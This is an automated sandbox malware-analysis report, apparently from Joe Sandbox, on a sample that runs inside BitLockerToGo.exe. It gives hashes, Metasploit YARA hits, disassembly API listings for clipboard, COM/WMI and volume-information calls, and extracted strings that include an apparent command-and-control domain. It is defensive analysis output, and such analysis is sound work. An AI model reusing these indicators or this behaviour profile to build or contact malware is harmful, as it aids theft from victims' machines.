                                                                                                                                                        File size:25'899'008 bytes
                                                                                                                                                        MD5 hash:05443B11C90686DB9E945C7B5DB2083F
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Yara matches:
                                                                                                                                                        • Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 00000000.00000003.2197228069.0000000004100000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                        • Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 00000000.00000002.2281733359.0000000004100000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                        Reputation:low
                                                                                                                                                        Has exited:true

                                                                                                                                                        Target ID:2
                                                                                                                                                        Start time:19:43:11
                                                                                                                                                        Start date:12/10/2024
                                                                                                                                                        Path:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                                                                                                                                                        Imagebase:0x300000
                                                                                                                                                        File size:231'736 bytes
                                                                                                                                                        MD5 hash:A64BEAB5D4516BECA4C40B25DC0C1CD8
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:moderate
                                                                                                                                                        Has exited:true

                                                                                                                                                          Execution Graph

                                                                                                                                                          Execution Coverage:2.2%
                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                          Signature Coverage:58.4%
                                                                                                                                                          Total number of Nodes:77
                                                                                                                                                          Total number of Limit Nodes:12

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          APIs
                                                                                                                                                          • VariantInit.OLEAUT32(?), ref: 0043C898
                                                                                                                                                          • SysStringLen.OLEAUT32(?), ref: 0043C97A
                                                                                                                                                          • VariantClear.OLEAUT32(?), ref: 0043CB56
                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 0043CC31
                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 0043CC37
                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 0043CC48
                                                                                                                                                          • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 0043CC8C
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: String$Free$Variant$ClearInformationInitVolume
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 171077572-0
                                                                                                                                                          • Opcode ID: 2cdfd943b68b243232979bf229ff110a1a12fc1fad690d09bae0bc54f57bced0
                                                                                                                                                          • Instruction ID: f391356ba1e6a8e6107e64313ae411c35e8f889d22a0f8dca9c0fab8c944a7a2
                                                                                                                                                          • Opcode Fuzzy Hash: 2cdfd943b68b243232979bf229ff110a1a12fc1fad690d09bae0bc54f57bced0
                                                                                                                                                          • Instruction Fuzzy Hash: FD91DC7A208300DFD714CF24D895B6AB7E6FFC9311F19882DE585972A0EB78E905CB06

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CurrentProcess$AdminExitInputStateThreadUser
                                                                                                                                                          • String ID: SPQV
                                                                                                                                                          • API String ID: 2882748383-3051931956
                                                                                                                                                          • Opcode ID: e56aa9daf5246d202b2c64d9be988e99a472127fa7ffee492877946f3a7061e5
                                                                                                                                                          • Instruction ID: b95e72557b87e2371c7c31153d7f42c66cf6c520f11fa7e329d023154aa7c17a
                                                                                                                                                          • Opcode Fuzzy Hash: e56aa9daf5246d202b2c64d9be988e99a472127fa7ffee492877946f3a7061e5
                                                                                                                                                          • Instruction Fuzzy Hash: B731C0205483418BE7006B39945936BABE2DF82314F149E7EE8C1E73D2CA7C884A875B

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          APIs
                                                                                                                                                          • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004116C6
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: DirectorySystem
                                                                                                                                                          • String ID: C4C798787793A87B05133B3AEA4D70B5$sergei-esenin.com$z
                                                                                                                                                          • API String ID: 2188284642-416752710
                                                                                                                                                          • Opcode ID: 09a3d132a8991bdf110bc2dcb3610039df58993b2a6f5c0ce4b54fd06424c926
                                                                                                                                                          • Instruction ID: 345b3c13d49c59ed0b7ac164e6a763aa61c9bb11201d1002ab0abdaf27a0931a
                                                                                                                                                          • Opcode Fuzzy Hash: 09a3d132a8991bdf110bc2dcb3610039df58993b2a6f5c0ce4b54fd06424c926
                                                                                                                                                          • Instruction Fuzzy Hash: 96C120B550D3C08BE3319F2498917EBBBE2EF96304F08496ED8D98B391D73948058B87

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          APIs
                                                                                                                                                          • SysAllocString.OLEAUT32(?), ref: 0043CD30
                                                                                                                                                          • SysAllocString.OLEAUT32(F3BFF1A3), ref: 0043CE15
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AllocString
                                                                                                                                                          • String ID: !$s%u'
                                                                                                                                                          • API String ID: 2525500382-439224852
                                                                                                                                                          • Opcode ID: 2be98a605ab4fa336a6b2c318d79c7287d5e615792c9c667367571fb568a7bc0
                                                                                                                                                          • Instruction ID: 37b18a3e4ebf56d3d23ab1ff9e7973853f3fda15609219be389b3e4743c51eac
                                                                                                                                                          • Opcode Fuzzy Hash: 2be98a605ab4fa336a6b2c318d79c7287d5e615792c9c667367571fb568a7bc0
                                                                                                                                                          • Instruction Fuzzy Hash: CE4104B66993418FE314CF66D8C425BBBE3ABC5304F19996CE0949B345CBB8C50B8B52

Control-flow Graph (rendered graph not recoverable; basic blocks listed): 43c6ca-43c6f6 (CoCreateInstance), 43c700-43c746 (CoCreateInstance), 43c752, 43c754-43c757
APIs
• CoCreateInstance.OLE32(00449CF0,00000000,00000001,00449CE0,00000000), ref: 0043C6F0
• CoCreateInstance.OLE32(00449CF0,00000000,00000001,00449CE0,00000000), ref: 0043C746
Strings
Memory Dump Source
• Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Similarity
• API ID: CreateInstance
• String ID: \
• API String ID: 542301482-2967466578
• Opcode ID: c5e4514dbbed5f853774e9bd6e6f5144ba8530d52371be91707f697448a59d9b
• Instruction ID: 831dfc0ff0a5989b13bcf6da42eb41807a4eea7ad8a9b6a3e013ccaa1ef03f5d
• Opcode Fuzzy Hash: c5e4514dbbed5f853774e9bd6e6f5144ba8530d52371be91707f697448a59d9b
• Instruction Fuzzy Hash: 59F0BDB4188300EFF320CF10C88AB5BBBE4BB85715F108419F699592D0CBB99458CF9A

Control-flow Graph (rendered graph not recoverable): 63 basic blocks spanning 443d4f-4441e6; calls to 0040c720 (from 443ea0-443ea9 and 443eb0-443eb6) and to 0040c710 (from 443d9e-443dbb and 443e42-443e43)
Strings
Memory Dump Source
• Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID: 2AD$RAD$@D
• API String ID: 0-3582015610
• Opcode ID: ea4e0c86f75012814c625301c25dbf1953a5eab78e3f56fb16b9dd3b3d3b046e
• Instruction ID: b29bc3ce0ce52f2a802cac78edcec5ed59897568a8abb7e99fb958c72efa2712
• Opcode Fuzzy Hash: ea4e0c86f75012814c625301c25dbf1953a5eab78e3f56fb16b9dd3b3d3b046e
• Instruction Fuzzy Hash: EAC11636608351CFC724CF39E88021AB7E2AB99316F5D8A7DD895873A6E734DA05CB44

Control-flow Graph (rendered graph not recoverable; basic blocks listed): 4438e4-4438fb, 443900-443938, 44393a-443941, 443943-44394f, 443950-443957, 443959-44395c, 44395e, 443960-443966, 443968-443971 (call 443090), 443976, 443979-44398f
Strings
Memory Dump Source
• Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Similarity
• API ID: InitializeThunk
• String ID: ;:=<$5L
• API String ID: 2994545307-3673700819
• Opcode ID: 459832366922f5352c287ef8b3f707be57a2ffb6f6291cd65d3ed09dc2ce6e1c
• Instruction ID: 0915b61cec8b6da82ef9958de482462b63df0f8c2db182df6872d9399d6bb0c3
• Opcode Fuzzy Hash: 459832366922f5352c287ef8b3f707be57a2ffb6f6291cd65d3ed09dc2ce6e1c
• Instruction Fuzzy Hash: F6115572B40206ABEB048E58C8827FAB7B2EB82716F241039E141E73D2D378CF02D755
APIs
• LdrInitializeThunk.NTDLL(004463BD,005C003F,00000006,?,?,00000018,?,?,?), ref: 004430BE
Memory Dump Source
• Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
• Instruction ID: fb6f357373f259be8b0e83fffc5d2a3912a28e0da7d2036ce94b71e982b3a7e9
• Opcode Fuzzy Hash: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
• Instruction Fuzzy Hash: 76E0FE75908316AB9A09CF45C14444EFBE5BFC4714F11CC8DA4D867210D3B0AD46DF82
Strings
Memory Dump Source
• Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID: ;:=<
• API String ID: 0-1779823811
• Opcode ID: 87d10e265b9409441902dcb20c09a73f5c0b134dd14e95eeb65f61383757cde8
• Instruction ID: adc97f9d6fe2411c167095a796a90811affcd3ff35bd650b1f034ac4979ada3a
• Opcode Fuzzy Hash: 87d10e265b9409441902dcb20c09a73f5c0b134dd14e95eeb65f61383757cde8
• Instruction Fuzzy Hash: 3D21C331B402149BEB18CF58D8926EA73B1EB56706F151429E582F7393D23CDD029B55
Memory Dump Source
• Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b33d5e7daedefb019597bc06dd43f22d754fd82a51e035dddc4ebd59be78687c
• Instruction ID: ea02171e685dfcb71a4e86459bfb6a5071aa3875873d77bf6977821c90d9e4a5
• Opcode Fuzzy Hash: b33d5e7daedefb019597bc06dd43f22d754fd82a51e035dddc4ebd59be78687c
• Instruction Fuzzy Hash: 8681D076241B00CFD3248F65DC90BA7B3F6FB89301F198A3DD996876A1D774A809CB54

Control-flow Graph (rendered graph not recoverable; basic blocks listed): 43cb4d-43cb70 (call 40c720, VariantClear), 43cb80-43cb89, 43cb90-43cb9c, 43cba3, 43cba6-43cbca (call 4352d0), 43cbd0-43cbd8, 43cbda-43cbe4, 43cbf0-43cbfd, 43cc04-43cc10, 43cc27-43cc95 (SysFreeString x3, call 4457f0, GetVolumeInformationW), 43cc9c-43cca3, 43cca4-43ccb6
APIs
• VariantClear.OLEAUT32(?), ref: 0043CB56
• SysFreeString.OLEAUT32(?), ref: 0043CC31
• SysFreeString.OLEAUT32(?), ref: 0043CC37
• SysFreeString.OLEAUT32(?), ref: 0043CC48
• GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 0043CC8C
Memory Dump Source
• Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Similarity
• API ID: FreeString$ClearInformationVariantVolume
• String ID:
• API String ID: 1909038640-0
• Opcode ID: 6e28de4ba5478020d8d62bc26180408a0e151cd4c9bce5f6e352a1b502264b13
• Instruction ID: 71f6587865aeb7983240f0c874f145aba01153f807fa23e12df9d9708cfabf33
• Opcode Fuzzy Hash: 6e28de4ba5478020d8d62bc26180408a0e151cd4c9bce5f6e352a1b502264b13
• Instruction Fuzzy Hash: 7A31CA3A608340DFD7149F20EC99B5EB3A6EB89316F18483CE505872A1EB75E414CB15

Control-flow Graph (rendered graph not recoverable; basic blocks listed): 43c75e-43c798, 43c7a0-43c7e7, 43c7e9-43c80e (SysAllocString), 43c812-43c817
APIs
• SysAllocString.OLEAUT32(C30DC172), ref: 0043C7EE
Memory Dump Source
• Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Similarity
• API ID: AllocString
• String ID:
• API String ID: 2525500382-0
• Opcode ID: db18a2924d06b779c85f447bad0e32e0505d9cde8ebe1f2047603a1bc77517cd
• Instruction ID: 32f87fcb3125a501a8162f492a5ccfcff4981966fb883e090f713be905f41a06
• Opcode Fuzzy Hash: db18a2924d06b779c85f447bad0e32e0505d9cde8ebe1f2047603a1bc77517cd
• Instruction Fuzzy Hash: 02112C755883028FD314CF95C8C075ABBE1FBCA321F088A6CE4859B245D778D50ACFA1

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          control_flow_graph 273 440350-44035f 274 440366-440377 273->274 275 4403c0 273->275 276 4403d1-4403d5 273->276 277 4403c2-4403cb RtlFreeHeap 273->277 278 440380-4403a6 274->278 275->277 277->276 278->278 279 4403a8-4403b1 278->279 279->275
                                                                                                                                                          APIs
                                                                                                                                                          • RtlFreeHeap.NTDLL(?,00000000,?), ref: 004403CB
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: FreeHeap
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3298025750-0
                                                                                                                                                          • Opcode ID: 430a487729389f3d10e887d9154233dceb637cb42ec30677b57755ed99ff6f15
                                                                                                                                                          • Instruction ID: 4a203bc74b8270b695fc07406262592e49ddfe5960292de94af20fe31efdee2e
                                                                                                                                                          • Opcode Fuzzy Hash: 430a487729389f3d10e887d9154233dceb637cb42ec30677b57755ed99ff6f15
                                                                                                                                                          • Instruction Fuzzy Hash: 03F0F6342893408FD709DB24ECB1B2A7BA9DB9A305F54457CD0C147292C27A982ADB92

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          control_flow_graph 280 443250-443264 281 443270-4432a4 280->281 281->281 282 4432a6-4432ee GetForegroundWindow call 446050 281->282
                                                                                                                                                          APIs
                                                                                                                                                          • GetForegroundWindow.USER32 ref: 004432BD
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ForegroundWindow
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2020703349-0
                                                                                                                                                          • Opcode ID: b08362b67b80bfc51f9b0781085942b41de1b7f4ec4a0f44df321009077aec9b
                                                                                                                                                          • Instruction ID: 0a330300c86dc513bb90ae8d1cfff6d0cb8803b403817d65af22f579e6835f05
                                                                                                                                                          • Opcode Fuzzy Hash: b08362b67b80bfc51f9b0781085942b41de1b7f4ec4a0f44df321009077aec9b
                                                                                                                                                          • Instruction Fuzzy Hash: 98014936A042409BE719CF79D87567BB7D1AF15306B08846DD187C7392E738A609C709

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          control_flow_graph 286 443016-44301d 287 443024-44302b 286->287 288 443070-443079 call 440350 286->288 289 443032-44303f 286->289 290 443068-44306e call 4402e0 286->290 287->288 287->289 297 44307b-443082 288->297 291 443040-443052 289->291 290->297 291->291 294 443054-443066 RtlReAllocateHeap 291->294 294->297
                                                                                                                                                          APIs
                                                                                                                                                          • RtlReAllocateHeap.NTDLL(?,00000000), ref: 00443060
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AllocateHeap
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1279760036-0
                                                                                                                                                          • Opcode ID: 8bb3e970414ffc9c2c949af03973c1fc5cdc76312b598d5c6727cbb62392ed25
                                                                                                                                                          • Instruction ID: d129c93a184b066006015a983a9b899f1640726f44b1bfbb2ea2b15d68b00d4c
                                                                                                                                                          • Opcode Fuzzy Hash: 8bb3e970414ffc9c2c949af03973c1fc5cdc76312b598d5c6727cbb62392ed25
                                                                                                                                                          • Instruction Fuzzy Hash: 28F04634A04342DFE7110FB8ACE57A7BF64FB57715F0407BADA114A1A3DB388865C685
                                                                                                                                                          APIs
                                                                                                                                                          • RtlAllocateHeap.NTDLL(?,00000000), ref: 0044033F
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AllocateHeap
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1279760036-0
                                                                                                                                                          • Opcode ID: 2485c01211ce712cfbbd45a4efc2b111ae01a3d9bf3e5c06704cc5ec5e162443
                                                                                                                                                          • Instruction ID: 802ee138748a9c1de57adb9ff5e7dd8bb977f0f805929440982499d5bfcd79cd
                                                                                                                                                          • Opcode Fuzzy Hash: 2485c01211ce712cfbbd45a4efc2b111ae01a3d9bf3e5c06704cc5ec5e162443
                                                                                                                                                          • Instruction Fuzzy Hash: 99F0EC39380724CFCB168AA2F840555B721EBC663A71881FAD9315BAE2C2790817CB90
                                                                                                                                                          APIs
                                                                                                                                                          • GetForegroundWindow.USER32 ref: 004432BD
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ForegroundWindow
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2020703349-0
                                                                                                                                                          • Opcode ID: 8706f1abee52da8bff56e989da8888f74a9f68174d20dcfd9d535ed2545853d7
                                                                                                                                                          • Instruction ID: 730dbf267ab9c65472c63067bb6e41d1d4c7e74c9f538b4d6545cc4e430076e3
                                                                                                                                                          • Opcode Fuzzy Hash: 8706f1abee52da8bff56e989da8888f74a9f68174d20dcfd9d535ed2545853d7
                                                                                                                                                          • Instruction Fuzzy Hash: 3CE0867E5003009FC700DF54EC9146937A0E7073063050439E143D33A2D734A544CB1A
                                                                                                                                                          APIs
                                                                                                                                                          • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00411293
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: InitializeSecurity
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 640775948-0
                                                                                                                                                          • Opcode ID: 4c2b1588ea85639d6cb6d05cbbdf0db7d68b21365f39083882640298d32fd0a2
                                                                                                                                                          • Instruction ID: 1bf7a1bd5185e41d29c4a2cbb7d1407be12a0acaffe88bf902526c463dcd8eef
                                                                                                                                                          • Opcode Fuzzy Hash: 4c2b1588ea85639d6cb6d05cbbdf0db7d68b21365f39083882640298d32fd0a2
                                                                                                                                                          • Instruction Fuzzy Hash: ACD092343D8300B6F2710B08BC17F043120A303F22F700320B3207C1E189E07110961E
                                                                                                                                                          APIs
                                                                                                                                                          • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0043C833
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: BlanketProxy
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3890896728-0
                                                                                                                                                          • Opcode ID: ff6f4091f85bc74b46a1bdf2edf96c5b09c9cbc6c8c7167365f80d7df66e59cf
                                                                                                                                                          • Instruction ID: 654b4b1d450e911c26586d927dca2102275bdb567952844bef8e5804c0f87415
                                                                                                                                                          • Opcode Fuzzy Hash: ff6f4091f85bc74b46a1bdf2edf96c5b09c9cbc6c8c7167365f80d7df66e59cf
                                                                                                                                                          • Instruction Fuzzy Hash: BAD048383C4308BAF3324B14FC1BF083664B792F03F201420B781BC0E18AF1A2609A1E
                                                                                                                                                          APIs
                                                                                                                                                          • CoInitialize.OLE32(00000000), ref: 00411271
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Initialize
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2538663250-0
                                                                                                                                                          • Opcode ID: 57e0faa4300627c3268436e8894b121cac013d14c93084444cf44528358cced8
                                                                                                                                                          • Instruction ID: 3969f46c452db3cda2ce3cdd2237f3c33a7c6bfde3ae9b63386c6deee56049b4
                                                                                                                                                          • Opcode Fuzzy Hash: 57e0faa4300627c3268436e8894b121cac013d14c93084444cf44528358cced8
                                                                                                                                                          • Instruction Fuzzy Hash: F9C08C30024208A7F220272DAC0BF43392CE303721F000330F9A0400D2AA106420C5BB
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: %*+($("C$57W3$6~$7ABC$<=>?$DsQX$Ga@J$IJKL$LMNg$SH'T$T$U^_`$YZ[+$_=I?$`abc$akm~$h$h {$mnop$pqrs$q2)$r}$tuv?$uFuS$x$xr$y1D3$z$
                                                                                                                                                          • API String ID: 0-2038162739
                                                                                                                                                          • Opcode ID: 0bb57e1c5453cf98c4a9267963c7448f932b21328b9716a290e2aedad4505a53
                                                                                                                                                          • Instruction ID: 7cc78f0828f2510ceae9c517330c9c726504de680cfe05bf1d4d9fa86db73ffd
                                                                                                                                                          • Opcode Fuzzy Hash: 0bb57e1c5453cf98c4a9267963c7448f932b21328b9716a290e2aedad4505a53
                                                                                                                                                          • Instruction Fuzzy Hash: 29A212706083908BD734CF25D4907ABBBE1AFE6304F58892EE1D95B392D7788906CB57
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
                                                                                                                                                          • String ID: $$%$&$'$)$+$.$9
Strings
Memory Dump Source
• Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID: %W'U$'[(Y$(S)Q$,o}m$6K;I$J<BJ$W?O=$\+^)$_'[%$bxMlIAxRNFAWJgPn4rB1sAax3Kr_T1ZtpPoatisDzkE-1728776609-0.0.1.1-/api$o/^-$rY$zkji$|p|~
Strings
Memory Dump Source
• Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID: 17$%*+($%*+($89$@A$SQ$Tt$W@$\2$`q$e{$}s$KI
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Similarity
• API ID: Uninitialize
• String ID: 4 E$4 E$8$:;:9$D'5%$H#Y!$M/_-$T]R#$o+X)$sergei-esenin.com
Strings
Memory Dump Source
• Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID: 17$%*+($%*+($89$@A$SQ$Tt$W@$\2$`q$e{$}s
Strings
Memory Dump Source
• Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID: $ $!$!$"$"$9$<$>$S$e$~
Strings
Memory Dump Source
• Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Similarity
• API ID: InitializeThunk
• String ID: %$%$%$($($($*$*$*$+$+$+
Strings
Memory Dump Source
• Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID: %*+($%*+($))?=$*,( $-)+=$30"w$4 E$=!?8$JA$Ui&$$p%3!
Strings
Memory Dump Source
• Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Similarity
• API ID:
